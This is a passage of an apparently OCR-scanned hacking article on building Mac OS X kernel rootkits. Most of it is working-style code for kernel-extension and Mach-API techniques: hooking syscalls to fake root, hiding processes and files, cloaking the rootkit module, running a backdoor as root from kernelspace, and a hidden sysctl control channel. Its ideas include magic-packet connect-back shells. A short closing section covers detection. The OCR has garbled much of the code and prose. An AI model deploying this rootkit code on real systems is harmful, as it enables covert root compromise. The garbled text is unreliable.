define p_starttime p_un.__p_starttime 


struct vmspace *p_vmspace; /* Address space. */ 

struct sigacts *p_sigacts; /* Signal actions, state (PROC ONLY). */ 
int p_flag; /* P_* flags. */ 

char p_stat; /* S* process status. */ 

pid_t p_pid; /* Process identifier. */ 

pid_t p_oppid; /* Save parent pid during ptrace. XXX */ 

int p_dupfd; /* Sideways return value from fdopen. XXX */ 
/* Mach related */ 

caddr_t user_stack; /* where user stack was allocated */ 

void *exit_thread; /* XXX Which thread is exiting? */ 

int p_debugger; /* allow to debug */ 
boolean_t sigwait; /* indication to suspend */ 

/* scheduling */ 

u_int p_estcpu; /* Time averaged value of p_cpticks. */ 

int p_cpticks; /* Ticks of cpu time. */ 

fixpt_t p_pctcpu; /* Scpu for this process during p_swtime */ 
void *p_wchan; /* Sleep address. */ 

char *p_wmesg; /* Reason for sleep. */ 

u_int p_swtime; /* Time swapped in or out. */ 

u_int p_slptime; /* Time since last blocked. */ 

struct itimerval p_realtimer; /* Alarm timer. */ 

struct timeval p_rtime; /* Real time. */ 

u_quad_t p_uticks; /* Statclock hits in user mode. */ 
u_quad_t p_sticks; /* Statclock hits in system mode. */ 
u_quad_t p_iticks; /* Statclock hits processing intr. */ 
int p_traceflag; /* Kernel trace points. */ 

struct vnode *p_tracep; /* Trace to vnode. */ 

int p_siglist; /* DEPRECATED */ 

struct vnode *p_textvp; /* Vnode of executable. */ 

int p_holdcnt; /* If non-zero, don’t swap. */ 
sigset_t p_sigmask; /* DEPRECATED. */ 

sigset_t p_sigignore; /* Signals being ignored. */ 

sigset_t p_sigcatch; /* Signals being caught by user. */ 

u_char p_priority; /* Process priority. */ 

u_char p_usrpri; /* User-priority based on p_cpu and p_nice. */ 
char p_nice; /* Process "nice" value. */ 

char p_comm[MAXCOMLEN+1]; 

struct pgrp *p_pgrp; /* Pointer to process group. */ 

struct user *p_addr; /* Kernel virtual addr of u-area (PROC ONLY). */ 
u_short p_xstat; /* Exit status for wait; also stop signal. */ 


Ay. 
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u_short p_acflag; /* Accounting flags. */ 
struct rusage *p_ru; /* Exit information. XXX */ 


}; 


The internal definition in the kernel is available from the xnu source in 
the file xnu-xxx/bsd/sys/proc_internal.h and contains a lot more info than 
it’s userland counterpart. If we take a look at the userland version of 
the proc structure from Mac OS X 10.3, with Darwin 7.0, and compares it to 
the structure above we can spot the differences right away (some comments 
and whitespace is removed to save space and make it more readable) 


struct proc { 


LIST_ENTRY (proc) p_list; /* List of all processes. */ 
struct pcred *p_cred; /* Process owner’s identity. */ 
struct filedesc *p_fd; /* Ptr to open files structure. */ 
struct pstats *p_stats; /* Accounting/statistics (PROC ONLY). 
struct plimit *p_limit; /* Process limits. */ 
struct sigacts *p_sigacts; /* Signal actions, state (PROC ONLY). 
define p_ucred p_cred->pc_ucred 
define p_rlimit p_limit-—>pl_rlimit 
int p_flag; /* P_* flags. */ 
char p_stat; /* S* process status. */ 
char p_pad1 [3]; 
pid_t p_pid; /* Process identifier. */ 
LIST_ENTRY (proc) p_pglist; /* List of processes in pgrp. */ 
struct proc *p_pptr; /* Pointer to parent process. */ 
LIST_ENTRY (proc) p_sibling; /* List of sibling processes. */ 
,IST_HEAD(, proc) p_children; /* Pointer to list of children. */ 


#define p_startzero p_oppid 


pid_t p_oppid; /* Save parent pid during ptrace. XXX */ 
int p_dupfd; /* Sideways return value from fdopen. XXX */ 
u_int p_estcpu; /* Time averaged value of p_cpticks. */ 
int p_cpticks; /* Ticks of cpu time. */ 
fixpt_t p_pctcpu; /* Scpu for this process during p_swtime */ 
void *p_wchan; /* Sleep address. */ 
char *p_wmesg; /* Reason for sleep. */ 
u_int p_swtime; /* DEPRECATED (Time swapped in or out.) */ 
#define p_argslen p_swtime /* Length of process arguments. */ 
u_int p_slptime; /* Time since last blocked. */ 
struct itimerval p_realtimer; /* Alarm timer. */ 
struct timeval p_rtime; /* Real time. */ 
u_quad_t p_uticks; /* Statclock hits in user mode. */ 
u_quad_t p_sticks; /* Statclock hits in system mode. */ 
u_quad_t p_iticks; /* Statclock hits processing intr. */ 
int p_traceflag; /* Kernel trace points. */ 
struct vnode *p_tracep; /* Trace to vnode. */ 
sigset_t p_siglist; /* DEPRECATED. */ 
struct vnode *p_textvp; /* Vnode of executable. */ 
define p_endzero p_hash.le_next 
LIST_ENTRY (proc) p_hash; /* Hash chain. */ 
TAILQ HEAD( ,eventgqelt) p_evlist; 
define p_startcopy p_sigmask 
sigset_t p_sigmask; /* DEPRECATED */ 
sigset_t p_sigignore; /* Signals being ignored. */ 
sigset_t p_sigcatch; /* Signals being caught by user. */ 
u_char p_priority; /* Process priority. */ 
u_char p_usrpri; /* User-priority based on p_cpu and p_nice. */ 
char p_nice; /* Process "nice" value. */ 
char p_comm[MAXCOMLEN+1]; 
struct pgrp *p_pgrp; /* Pointer to process group. */ 
#define p_endcopy p_xstat 
u_short p_xstat; /* Exit status for wait; also stop signal. */ 
u_short p_acflag; /* Accounting flags. */ 
struct rusage *p_ru; /* Exit information. XXX */ 
int p_debugger; /* 1: can exec set-bit programs if suser */ 
void *task; /* corresponding task */ 


void *sigwait_thread; /* ‘thread’ holding sigwait */ 
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struct lock__bsd__ signal_lock; /* multilple thread prot for signals 
boolean_t sigwait; /* indication to suspend */ 

void *exit_thread; /* Which thread is exiting? */ 
caddr_t user_stack; /* where user stack was allocated */ 
void * exitarg; /* exit arg for proc terminate */ 
void * vm_shm; /* for sysV shared memory */ 

int p_argc; /* saved arge for sysctl_procargs() 
int p_vforkcnt; /* number of outstanding vforks */ 

void * p_vforkact; /* activation running this vfork proc */ 
TAILQ_HEAD( , uthread) p_uthlist; /* List of uthreads */ 

pid_t si_pid; 

u_short si_status; 

u_short si_code; 

uid_t si_uid; 

TAILQ HEAD( , aio_workq_entry ) aio_actived; 

int aio_active_count; /* entries on aio_activeg */ 
TAILQ HEAD( , aio_workq_entry ) aio_doneq; 

int aio_done_count; /* entries on aio_doneq */ 
struct klist p_klist; /* knote list */ 

struct auditinfo *p_au; /* User auditing data */ 


if DIAGNOSTIC 
if SIGNAL DEBUG 
unsigned int lockpc[8]; 
unsigned int unlockpc[8]; 
endif /* SIGNAL_DEBUG */ 
endif /* DIAGNOSTIC */ 
}; 


As you can seen, Apple has redone this structure quite a bit and removed 
a lot of stuff, most of the changes where introduced between version 10.3 
and 10.4 of Mac OS X. One of the changes to the structure is the removal 
of the p_ucred pointer, which is a pointer to a structure that contains 
the user credentials of the current process. 


This effectively breaks nemos [5] technique of setting a process user-id 
and group-id to zero, which he does like this: 


void uidO(struct proc *p) { 
register struct pcred *pc = p->p_cred; 
pcred_writelock (p); 
(void) chgproccnt (pc->p_ruid, -1); 
(void) chgprocecnt (0, 1); 
pc->pc_ucred = crcopy (pc->pc_ucred) ; 
pc->pc_ucred->cr_uid = 0; 
pc->p_ruid = 0; 
pc->p_svuid = 0; 
pcred_unlock (p); 
set_security_token (p); 
p->p_flag |= P_SUGID; 
return; 


} 


For a rootkit developer that wants to modify specific kernel structures 
this is somewhat of a problem, both the fact that the kernel structures 
are neither exported or well documented and the fact that they might 
rapidly change between kernel versions. Fortunately the kernel source is 
now open source and can be freely downloaded from Apple. This makes it 
possible to extract the needed kernel structures from the source. 


-[ 2.4 - The I/O Kit Framework 


Mac OS X contains a complete framework of libraries, tools and various 
other resources for creating device drivers. This framework is called the 
I/O Kit. The I/O Kit framework provides an abstract view of the hardware 
to the upper layers of Mac OS X, which simplifies device driver 
development and thus makes it’s less time consuming. Th ntire framework 
is object-oriented and implemented using a somewhat cut down version Ctt 
to promote increased code reus 


+ 


4 
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Since this framework operates in kernelspace and can interact with actual 
hardware, it’s ideal for writing keylogging software. A good example of 
abusing the I/O Kit framework for just that purpose is the keylogger 
called "logKext", [10] written by drspringfield, which utilizes the I/O 
Kit framework to log a users keystrokes. This is just one of many uses of 
this framework in rootkit development. Feel fr to explore and come up 
with your own creative ways of subverting the Mac OS X kernel using the 
I/O Kit framework. 


[ 3 Kernel development on Mac OS X 


As Mac OS X is somewhat of a hybrid between a number of different 
technologies runtime modification of the operating system can be done in 
several ways. One of the easiest methods is to load the ’ improved’ 
functionality as a kernel driver. Drivers can be loaded either as kernel 
extensions for the BSD sub-layer or as Object Oriented I/O Kit drivers. 
For the purpose of this first exercise only ordinary BSD kernel extensions 
will be utilized due to their simplicity and ease of development. 


The easiest way to write a kernel extension for Mac OS X is to use the 
XCode-templates for ’Generic Kernel Extension’. Open Xcode, Select ’New 
Project’ in the File-menu. From the list of available templates choose 
‘Generic Kernel Extension’ under ’Kernel Extension’. Give the project a 
suitable name, such as ’rootkit 0.1’ and click ’Finish’. This creates a 
new Xcode project for your new kernel rootkit. 


The newly automatically created .c-file contains the entry and exit points 
for the kernel extension: 


kern_return_t rootkit_0O_1 start (kmod_info_t * ki, void * d) { 
return KERN_SUCCESS; 


} 


kern_return_t rootkit_O_l_stop (kmod_info_t * ki, void * d) { 
return KERN_SUCCESS; 


} 


rootkit_0O_1 start() will be invoked when the kernel extension is loaded 


using /sbin/kextload and rootkit_0_l_stop() will be invoked when the 
kernel extension is unloaded using /sbin/kextunload. 


Loading and unloading of kernel extensions require root privileges, and 
the code in these functions will be executed in kernelspace with full 
control of the entire operating system. It is therefore of the utmost 
importance that any cod xecuted takes makes sure not to make a mess of 
everything and thereby crashes th ntire operating system. To quote the 
Apple ’Kernel Program Guide’: "Kernel programming is a black art that 
should be avoided if at all possible" [4]. 


Any changes made to the kernel in the start()-function must be undone in 
the stop-function(). Functions, variables and other types of loadable 
objects will be deallocated when the module is unloaded and any future 
reference to them will cause the operating system to misbehave or in worst 
case crash. 


Building your project is as easy as clicking the ’build button’. The 
compiled kernel extension can be found in the build/Relase/-directory and 
is named ‘rootkit 0.1.kext’. /sbin/kextload refuses to load kernel 
extensions unless they are owned by the root user and belongs to the wheel 
group. This can easily be fixed by chown:ing the files accordingly. 
Fledging kernel hackers that dislikes the Xcode GUI:s will be please to 
known that the project can be build just as easily from the command line 
using the ’xcodebuild’ command. 


rai 


Apple provides the XCode IDE and the gcc compiler on the Mac OS X DVD, if 
needed the latest version can also be downloaded from [2] after 
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registration. The source code for the XNU kernel can also be downloaded 
from [3]. It is recommended that you keep a copy of the kernel sourcecode 
at hand as reference during development. 


One of the great advantages of using the kernel extension API is that the 
kextload command takes care of everything from linking to loading. This 
means that the entire rootkit can be written in C, making it almost 
trivially easy. Another great advantage of C-development is portability 
which is an important issue considering that Mac OS X is available for two 
different CPU architectures. 


-{ 3.1 - Kernel version dependence 


As Landon Fuller notes in research access to the nsysent variable needed 
to find the sysentry-table is restricted unless the kext is compiled for a 
specific kernel release. This is due to the simple fact that the address 
of this variable is likely to change between kernel releases. Kernel 
dependence for kernel extensions is configured in the Info.plist file 
included in the XCode-project. The ’com.apple.kernel’-key needs to be 
added to OSBundleLibraries with the version set to the Kernel release as 
indicated by the ’uname -r’ command: 


<key>OSBundleLibraries</key> 

<dict> 
<key>com.apple.kernel</key> 
<string>9.6.0</string> 


</dict> 

This ties the compiled kernel extension specifically to version 9.6.0 of 
the Kernel. A recompile of the kernel extension is needed for each minor 
and major release. The kernel extension will refuse to load in any other 


version of the Mac OS X kernel, in many cases that might be considered a 
good thing. 


--[ 4 - Your first OS X kernel rootkit 
-[ 4.1 - Replacement of a simple syscall 


To start of the whole kernel subversion business we’1ll take a quick 

xample of replacing the getuid() function. This function returns the 
current user ID and in this example it will be replaced it with a function 
that always returns uid zero (root). This will not automatically give all 
users root access, only the illusion of having root access. Fun but 
innocent :) 


int new_getuid() 


{ 


return(0); 
} 


kern_return_t rootkit_0O_1 start (kmod_info_t * ki, void * d) { 


struct sysent *sysent = find_sysent(); 
sysent [SYS_getuid].sy_call = (void *) new_getuid; 


return KERN_SUCCESS; 


} 


This simple code-snippet first defines a new getuid()-function that always 


returns 0 (root). The new function will be loaded in kernel memory by the 
kextload-function. When the start()-function runs it will replace the 
original getuid() syscall with the new and /improved’ version. Returning 


KERN_SUCCESS indicates to the operating system that everything went as 
planed and that the insertion of the kernel extension was successful. 


A complete version can be found in the code section of this paper; 
including the unloading function that might prove useful once the initial 
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-[ 4.2 - Hiding processes 


The '’/bin/ps’ 
processes using the sysctl (3) 


command, ’top’ and the Activity Monitor all list running 
syscall. sysctl1(2) is a general purpose 


multifunction API used to communicate with a multitude of different 


functions in the kernel. 
as well open network sockets. 


sysctl (2) 


is used both to list running processes 


In order to intercept and modify the running 


process list the entire sysctl syscall needs to be intercepted and the 
commands parsed in order to identify calls to the CTL_KERN->KERN_PROC 
command used to list current running processes. 


etuid(), 


sysctl (2) 


‘name’. The commands are hierarchical and most commands have several 


he sysctl (2) 


syscall is intercepted using the exactly same method as 


but one of the major differences is that special attention needs 


T 

g 

to be taken with regards to the arguments. In order to support both big 
and little endian systems Apple uses padding macros named PADL and PADR 
that makes the argument struct look very exotic. The easiest way to get it 
right is to copy the entire struct definition from the XNU kernel source 
in order to avoid confusion with the padding. 


takes its function commands in the form of a char-array called 


subcommands that in turn can have subcommands or arguments. The sysctl (2) 


commands and their respectiv 


'/usr/include/sys/sysctl.h’. 


The CTL_K 


ERN->K 


subcommands can be found in 


ERN_ PROC command to sysctl copies a list of all running 


processes to a user provided buffer. From the perspective of the rootkit 
this presents a problem since we want to modify the data before it is 
returned to the user but since the syscall writes the data directly to the 
user provided buffer this is problematic. Fortunately we are in position 
to manipulate the data in the user buffer prior returning control to the 
user software. 


kernelspac 


First memory needed to store 


This requires copying the data from userspace into a 
buffer, 


doing the required modification and then copying the 
data back into userspace. 


the copy of the data needs to be allocated 


using the MALLOC-macro, then the data needs to be copied from userspace 
using the copyin(9)-function. The 


userspac 


to kernelspac 


ntries removed. Th 
overwriting it with the rest of the data in the buffer. This requires 
doing an overlapping memory copy, 
Once an entry has been removed the counter for the 

total size of the buffer needs to be decreased and the data can finally be 


bcopy (3) 


returned, 


or rather copied, 


function. 


copyin(9) function copies data from 


Then the data needs to be processed and selected 
actual process of deleting an entry is done by 


this functionality is provided by the 


to userspace. 


/* Search for process to remove */ 


-or 


(= 


(Oirameae 


< nprocs; itt) 


if (plist [i].kp_proc.p_pid == 11) /* hardcoded PID */ 


{ 


/* If there is more then one entry left in the list 
* overwrite this entry with the rest of the buffer */ 


if((i+1l) < nprocs) 
bcopy (&plist[it+l],&plist[i], (nprocs - (i + 1)) * sizeof(struct kinfo_proc) ); 


/* Decrease size */ 
oldlen -= sizeof(struct kinfo_proc); 
nprocs--; 


} 


The modified data is then copied back to the userspace buffer using the 
) function. In this case 
data to userspace. 
amounts of data to userspace whil 


copyout (9 


The suulong (9) 


two different functions are used to copy 
function is used to copy only small 
copyout (9) is used to copy the actual 
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data buffer. 


/* Copy back the length to userspace */ 
suulong(uap->oldlenp, oldlen) ; 


/* Copy the data back to userspace */ 
copyout (mem, uap->old, oldlen); 


The data trailing the last entry will, if the data was modified, contain 
an extra copy of the last entry in the buffer, something that might be 
used to detect that the buffer has been modified. To avoid this the 
trailing data can be zero:ed. A more sophisticated rootkit might want to 
store a copy of the original buffer prior to the call to the real syscall 
and use that data to pad the remaining buffer space. 


A reference implementation of a processes hiding kernel extension can be 
found in the code section of this paper. 


-[ 4.3 - Hiding files 


As noted earlier, three different syscalls are of interest when hiding 
files, SYS_getdirentries, SYS_getdirentriesattr and SYS_getdirentries64. 
All of these syscalls share the sysctl(2) approach in that the calling 
application provides a buffer that the syscall will fill with appropriate 
data and return a counter indicating how much data was written. Due to the 
variable size of each record pointer arithmetics is required when parsing 
the data. All in all it is a complicated procedure and any mishaps is 
likely to cause a kernel crash. It is also important to patch all three 
syscalls of the getdirent-syscall in order to maintain the illusion that 
the malicious files have disappeared. 


The process is very similar to hiding a process; the original function is 
invoked, the data copied from userspace to kernelspace, modified as needed 
and then copied back. 


A reference implementation of a file hiding kernel extension can be found 
in the code section of this paper. 


-[ 4.4 —- Hiding a kernel extension 


Kernel modules can be listed with the command ’kextstat’. If the rogue 
rootkit kernel extension can be easily identified using the kextstat 
commands it sort of voids the purpose of the rootkit. nemo [5] identified 
a simple and elegant way to hide the presence of a kernel module for the 
WeaponX [9] kernel rootkit. 


extern kmod_info_t *kmod; 


void activate_cloaking() 
{ 
kmod_info_t *k; 
k = kmod; 
kmod = k->next; 


} 


This short snippet of code finds the linked list containing the loaded 
modules and simply delinks the last loaded module from that list. Since 
the kextstat utility will walk this list when presenting the information 
on loaded kernel extensions the newly loaded rootkit will disappear from 
that list. For the same reason the kextunload utility will also fail to 
unload the module from the kernel, which actually can be quite annoying. 


-[ 4.5 - Running userspace programs from kernelspace 


On Mac OS X there exists a special API called KUNC (Kernel-User 
Notification Center) [6]. This API is used when the kernel (i.e. a KEXT) 
might need to display a notification to the user or run commands in 
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userspace. 


The KUNC function used to execute commands in userspace is KUNCExecute(). 
This function is quite handy in rootkit development, since we may execut 
any command we want as root from kernelspace. The function definition 
looks like this. 


(Taken from xnu-xxx/osfmk/UserNotification/KUNCUserNotifications.h) 
define kOpenApplicationPath 0 
define kOpenPreferencePanel 1 
define kOpenApplication 2 
define kOpenAppAsRoot 0 
define kOpenAppAsConsoleUser 1 


kern_ret_t 
KUNCExecute (char *executionPath, int openAsUser, int pathExecutionType) ; 


The "executionPath" is the file-system path to the application or 
executable to execute. The "openAsUser" flag can either be 
"kOpenAppAsConsoleUser", to execute the application as the logged-in user 
or “kOpenAppAsRoot", to run the application as root. The 
"pathExecutionType" flag specifies the type of application to execute, and 
can be one of the following. 


kOpenApplicationPath - The absolute file-system path to a executable. 
kOpenPreferencePanel The name of a preference pane in 
/System/Library/PreferencePanes. 

kOpenApplication - The name of a application in the "/Applications" folder. 


To execute the binary "/var/tmp/mybackdoor" we simply do like this: 


KUNCExecute ("/var/tmp/mybackdoor", kOpenAppAsRoot, kOpenApplicationPath) ; 


This function is especially useful in combination with some sort of 
trigger, like a hooked tcp-handler that executes the function and spawns a 
connect-—back shell to the source-ip of a magic trigger-packet. Th 
interesting parts of the network layer is actually exported and can be 
easily modified. 


Or if you prefer a local privilege escalation backdoor, why not hook 
SYS_open and execute the specified file with KUNCExecute if you supply a 
magic flag? The possibilities are endless. 


-{ 4.6 - Controlling your rootkit from userspace 


Once the appropriate syscalls and kernel functions has been replaced with 
rogue versions capable of hiding files, network sockets and processes each 
of these needs to know what to hide. 


A popular way to trigger process hiding is to hook SYS_kill and send a 
special signal (31337 perhaps?) to the process to hide. This is easy and 
requires no special tools of any kind. If the processes hiding is 
performed by setting special flags on the process this flag can be 
inherited for fork() and exec() and thereby hide an entire process-tr 


Hiding files and sockets is trickier since we have no easy way to indicate 
to the kernel that we want them hidden. The creation of a new syscall is 
an easy way, or to piggy-back on one of the hooked ones and have a special 
magic argument to trigger the communication code. This does however 
require special tools in userspace capable of calling the right syscall 
with the correct arguments. These tools can be identified and searched for 
even if the rootkit tries to hide them in the filesystem they are always 
vulnerable to offline analysis. 


An easy way to create a communication channel that doesn’t require special 
tools or an entry in the /dev/-directory is to use sysctl. In the Mac OS X 
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kernel drivers can register their own variables and have them changed 
using the /usr/sbin/sysctl-tool which is available by default on all 
systems. 


Registering a new sysctl can be easily done using the normal kext 
procedures. The source for the example below can be found in reference 7. 


/* global variable where argument for our sysctl is stored */ 
int sysctl_arg = 0; 


static int sysctl_hideproc SYSCTL_HANDLER_ARGS 
{ 


int error; 
error = sysctl_handle_int (oidp, oidp->oid_argl,oidp->oid_arg2, req); 


if ('error && req->newptr) 


{ 


if(arg2 == 0) 
printf ("Hide process %d\n",sysctl_arg) ; 
else 


printf("Unhide process %d\n",sysctl_arg) ; 
} 


/* We return failure so that we dont show up in "sysclt -A"-listings. */ 
return KERN_FAILURE; 


/* Create our sysctl:s */ 
SYSCTL_PROC (_hw, OID_AUTO, hideprocess, CTLTYPE_INT|CTLFLAG_ANYBODY |CTLFLAG_WR, 
ésysctl_arg, 0, &sysctl_hideproc , "I", "Hide a process"); 


SYSCTL_PROC (_hw, OID_AUTO, unhideprocess, CTLTYPE_INT|CTLFLAG_ANYBODY|CTLFLAG_WR, 
ésysctl_arg, 1, &sysctl_hideproc , "I", "Unhide a process"); 


kern_return_t kext_start (kmod_info_t * ki, void * d) f{ 


/* Register our sysctl */ 
sysctl_register_oid(&sysctl__hw_hideprocess) ; 
sysctl_register_oid(&sysctl__hw_unhideprocess) ; 


return KERN_SUCCESS; 


} 


This code registers two new sysctl variables, hw.hideprocess and 


hw.unhideprocess. When written to using sysctl -w hw.hideprocess=99 th 
function sysctl_hideproc() is invoked and can be used to add the selected 
PID to the list of processes to hide. A sysctl for hiding files is 


slightly different since it takes a string as argument instead of an 
integer but the overall procedure is the same. The major reason to use 
sysctl is that it support dynamic registration of variable and the 
required tool sysctl is provided by the operating system. 


The -A flag for sysctl is avoided by returning KERN_FAILURE whenever the 
function is called, this causes the newly created variables to be omitted 
from the listing. 


There is also a number of other ways of communicating with the kernel and 
controlling your rootkit. For example you can use the Mach API for IPC or 
using kernel control sockets, both has their pros and cons. 


--[ 5 - Runtime kernel patching using the Mach APIs 


Instead of using a rogue kernel module (kext) to hijack syscalls the Mach 

API’s can be used for runtime kernel patching. This is nothing new to the 

rootkit community, and has previously been used in rootkits such as SucKIT 
by sd [7] and phalanx by rebel [8], two very impressive rootkits for 
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Linux. 


To access kernel memory on Linux both SucKIT and phalanx uses /dev/kmem 
(and later /dev/mem). /dev/kmem and /dev/mem has been removed from Mac OS 
X as of version 10.4. The Mach-subsystem does however provide a very 
useful set of memory manipulation functions. The functions of interest for 
a rootkit developer are vm_read(), vm_write() and vm_allocate(). These 
functions allows arbitrary read and write access to th ntire kernel from 
userspace as well as allowing allocation of kernel memory. The only 
requirement is root access. 

The vm_allocate() function in particular is of great value. A common 


technique used on other operating systems to all 


locate kernel memory is to 


replace a system call handler with the kmalloc() function, and then 


execute the syscall. This way an attacker is abl 


kernelspace needed to store the wrapper functions. 


le to allocate memory in 
The big downside of 


this approach is the race condition introduced in case some other userland 


process calls the same syscall. But since the friendly Apple kernel 
developers provided the vm_allocate() function this isn’t necessary on Mac 
OS X. 


-[{ 5.1 - System call hijacking 


syscall hijacking. First off the address of the 


The vm_read() and vm_write() functions can be used as great tools for 


sysentry table needs to be 


from userspace as it does from kernelspace. Th 


To read the address to the handler function for 
sy_call variable of SYS_kill. 


mach_port_t port; 
pointer_t buf; /* pointer to your result */ 


located. The process identified by Landon Fuller [1] works just as good 


sysentry table contains 


pointers to all the syscall handler functions we want to hijack. 


a syscall, i.e. SYS_kill, 
we can use the vm_read() function, and passing it the address of the 


unsigned int r_addr = (unsigned int) &_sysent[SYS_kill].sy_call; /* address to sy_call */ 
unsigned int len = 4; /* number of bytes to read */ 
unsigned int sys_kill_addr = 0; /* final destination */ 


/* get a port to pid 0, the mach kernel */ 

if (task_for_pid(mach_task_self(), 0, &port)) { 
fprintf(stderr, "failed to get port\n"); 
exit (EXIT_FAILURE) ; 


/* read len bytes from r_addr, return pointer to the data in &buf */ 
if (vm_read(port, (vm_address_t)r_addr, (vm_size_t)len, é&buf, 


fprintf(stderr, "could not read memory\n") ; 
exit (EXIT_FAILURE) ; 


} 


/* do proper typecast */ 
sys_kill_addr = *(unsigned int*) buf; 


&SzZ) != KERN_SUCCESS) { 


The address to the SYS_kill handler is now available in the sys_kill_addr 
variable. Replacing a syscall handler is as simple as writing a new value 


to the same location using the vm_write() function. 
we replace the SYS_setuid system call handler with the handler for 


In the example below 


SYS_exit, which will result in the termination of any program that calls 


SYS_setuid. 


SYSENT *_sysent = get_sysent_from_mem(); 
mach_port_t port; 
pointer_t buf; 


unsigned int r_addr = (unsigned int) &_sysent[SYS_exit].sy_call; /* address to sy_call */ 
unsigned int len = 4; /* number of bytes to read */ 


unsigned int sys_exit_addr = 0; /* final destination */ 


unsigned int sz, addr; 
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/* get a port to pid 0, the mach kernel */ 

if (task_for_pid(mach_task_self(), 0, &port)) { 
fprintf(stderr, "failed to get port\n"); 
exit (EXIT_FAILURE) ; 


/* read len bytes from r_addr, return pointer to the data in &buf */ 

if (vm_read(port, (vm_address_t)r_addr, (vm_size_t)len, é&buf, &sz) != KERN_SUCCESS) 
fprintf(stderr, "could not read memory\n") ; 
exit (EXIT_FAILURE) ; 


} 


/* do proper typecast */ 
sys_exit_addr = *(unsigned int*) buf; 


/* address to system call handler pointer of SYS_setuid */ 
addr = (unsigned int) &_sysent[SYS_setuid].sy_call; 


/* veplace SYS_setuids handler with the handler of SYS_exit */ 
if (vm_write(port, (vm_address_t)addr, (vm_address_t) &sys_exit_addr, 
sizeof (sys_exit_addr))) { 
fprintf(stderr, "could not write memory\n"); 
exit (EXIT_FAILURE) ; 


} 


Now if any program calls setuid(), it will be redirected to the system 
call handler of SYS_exit, and end gracefully. The same thing that can be 
done using a kernel extension can also be accomplished using the Mach API. 


In order to actually create a wrapper or completely replace a function 
some kernel memory is needed to store the new code. Below is a simple 
example of how to allocate 4096 bytes of kernel memory using the Mach API. 


vm_address_t buf; /* pointer to our newly allocated memory */ 
mach_port_t port; /* a mach port is a communication channel between threads */ 


/* get a port to pid 0, the mach kernel */ 

if (task_for_pid(mach_task_self(), 0, &port)) { 
fprintf(stderr, "failed to get port\n"); 
exit (EXIT_FAILURE) ; 


/* allocate memory and return the pointer to é&buf */ 

if (vm_allocate (port, &buf, 4096, TRUE)) { 
fprintf(stderr, "could not allocate memory\n"); 
exit (EXIT_FAILURE) ; 


If everything went as planned we now have 4096 bytes of fresh kernel 
memory at our disposal, accessible via buf. This memory can be used as a 
place to store our syscall hooks 


=P S2s2, Direct Kernel Object Manipulation 


It is not just system calls that can be hijacked using this technique, it 
also works just as good to manipulate various other objects in 
kernelspace. A good example of such a object is the allproc structure, 
which is a list of proc structures of currently running processes on the 
system. This list is used by programs such as ps(1) and top(1) to get 
information about the running processes. 


So if you have processes you want to hide from a nosy administrator a nice 
way of doing so is by removing the process proc strcuture from the allproc 
list. This will make the process magically disappear from ps(1l), top(1) 
and any other tools that uses the allproc structure as source of 
information. 
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The allproc struct is, just as the nsysten variable, a exported symbol of 
the kernel. To get the address of the allproc structure in memory you may 
do something like this: 


nm /mach_kernel | grep allproc 
0054280c S _allproc 


Now that you have the address of the allproc structure (0x0054280c) all 
you need to do is to modify the list and remove the proc structure of 

the preferred process. As described in "Designing BSD Rootkits" [11] this 
is usually done iterating through the list with the LIST_FOREACH() macro 
and removing entries with the LIST_REMOVE() macro. Since we can’t modify 
the memory directly we have to use a wrapper utilizing the vm_read() and 
vm_write() functions, which we also leave as an exercise for the reader 
to implement. :) 


-—-[ 6 — Detection 


Detecting kernel rootkits can be very difficult. Some well known rootkits 
leaves traces in the filesystem or open network sockets that can be used 
to identify them. But this is nothing every rootkit does and wont help you 
to spot unknown rootkits. 


Keeping a known good list of the sysentry table and comparing that to the 
current state is another way to try to identify if syscalls have been 
modified. A popular workaround for that is to keep a shadow copy of the 
entire syscall table and modify the interupt-handler to the use the shadow 
table instead of the original one. This will leave the original sysentry 
table intact and anyone looking at it will find it unmodified even though 
all syscalls are still re-routed through the malicious functions. Another 
way is to replace th ntire interrupt-handler as well as the sysentry 
table. 


Rootkits that intercept syscalls and modify the contents can sometimes be 
found by the fact that the buffer used to return data has junk at the end. 
Rootkit developers could surely fix this problem, but they often don’t. 
Other indications of mischief is that calls that only returns counters, 
for instance the number of running processes, systematically doesn’t match 
the count of running processes when listed. 


One way of finding hidden files is to write software that accesses the 
underlying filesystem directly and matches the files on disk with the 
output from the kernel. This requires writing filesystem software or 
finding a library for the specific filesystem used. The upside is that it 
is virtually impossible to intercept and modify calls to the raw device. 


Rootkits that hide open ports can under some circumstances be detected by 
port-scanning, when more advanced rootkits often use port-knocking or 
other types out of band signaling to avoid opening ports. 


Detecting rootkits is a cat and mouse game, and the only winning move is 
not to play. 


-[ 6.1 - Detecting hooked system calls on Mac OS X 
Now that you know how to hook system calls, we are going to show you a 


simple, yet effective, way of detecting if your system has gotten any of 
it’s system calls hijacked. 


We already know that we can get the location of the sysent array in 
memory by adding 32 bytes to the exported nsysent symbol. We also know 
that the nsysent symbol contains the actual number of syscalls available 
on Mac OS X, which is 427 (Oxlab) on 10.5.6. 


Now, if we want to check if the current sysent array has been compromised 
we need something to compare it with, something like the original table. 
On Mac OS X the kernel image is a uncompressed, universal (Leopard) 
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macho-o binary named mach_kernel found in the root of the filesystem. If 
we take a closer look at the kernel image we get this: 


# otool -d /mach_kernel | grep -A 10 "ab 01" 


[is ve. ] 
0050a780 ab 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 


0050a790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 O00 00 
0050a7a0 00 00 00 00 94 cf 38 00 00 00 00 00 00 00 O00 00 
0050a7b0 01 00 00 00 00 00 00 00 01 00 00 00 6a 37 37 00 
# 


At 0050a780 we see the magic number 427 (0x00000lab), the number of 
available syscalls. If we look 32 bytes ahead we s the value 0x38cf94, 
can this be the start of the sysent array? I think it is! 


All we need to is to copy the kernel image to a buffer, find the offset to 
the nsysent symbol, add 32 bytes to the offset and return a pointer to 
that position and we have our original sysent array. All this can be done 
with the following C function. 


char * 
get_sysent_from_disk (void) 
{ 

char *p; 

FILE *fp; 


unsigned long sz; 


int. :1; 
fp = fopen("/mach_kernel", "r"); 
if (!fp) { 


fprintf(stderr, "could not open file\n"); 
exit (-1); 
} 


fseek(fp, 0, SEEK_END) ; 
sz = ftell (fp); 
fseek(fp, 0, SEEK_SET); 


buf = malloc(sz); 
p = buf; 


fread(buf, sz, 1, fp); 
fclose(fp); 


for (i = 0; i < sz; itt) { 
if (*(unsigned int *) (p) == O0x00000lab && 
*(unsigned int *) (p + 4) == 0x00000000) { 


return (p + 32); 
} 
ptt; 
} 


return NULL; /* epic fail */ 
} 


This function can later be used in a simple detector. 


